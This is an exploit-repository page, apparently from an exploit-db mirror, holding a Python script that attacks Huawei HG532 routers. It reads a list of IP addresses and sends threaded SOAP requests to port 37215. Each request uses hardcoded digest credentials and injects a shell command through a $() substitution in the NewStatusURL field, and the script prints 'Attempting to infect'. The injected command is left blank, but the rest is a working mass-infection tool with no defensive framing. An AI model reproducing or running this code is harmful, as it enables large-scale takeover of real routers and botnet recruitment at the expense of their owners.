f6c5c427c3
5 changes to exploits/shellcodes Apple macOS - IOHIDSystem Kernel Read/Write HP Mercury LoadRunner Agent magentproc.exe - Remote Command Execution (Metasploit) Cambium ePMP1000 - 'ping' Shell via Command Injection (Metasploit) Cambium ePMP1000 - 'get_chart' Shell via Command Injection (Metasploit) Huawei Router HG532 - Arbitrary Command Execution
25 lines
No EOL
1.1 KiB
Python
Executable file
25 lines
No EOL
1.1 KiB
Python
Executable file
import threading, sys, time, random, socket, re, os, struct, array, requests
|
|
from requests.auth import HTTPDigestAuth
|
|
ips = open(sys.argv[1], "r").readlines()
|
|
cmd = "" # Your MIPS (SSHD)
|
|
rm = "<?xml version=\"1.0\" ?>\n <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n <NewStatusURL>$(" + cmd + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n </s:Body>\n </s:Envelope>"
|
|
|
|
class exploit(threading.Thread):
|
|
def __init__ (self, ip):
|
|
threading.Thread.__init__(self)
|
|
self.ip = str(ip).rstrip('\n')
|
|
def run(self):
|
|
try:
|
|
url = "http://" + self.ip + ":37215/ctrlt/DeviceUpgrade_1"
|
|
requests.post(url, timeout=5, auth=HTTPDigestAuth('dslf-config', 'admin'), data=rm)
|
|
print "[SOAP] Attempting to infect " + self.ip
|
|
except Exception as e:
|
|
pass
|
|
|
|
for ip in ips:
|
|
try:
|
|
n = exploit(ip)
|
|
n.start()
|
|
time.sleep(0.03)
|
|
except:
|
|
pass |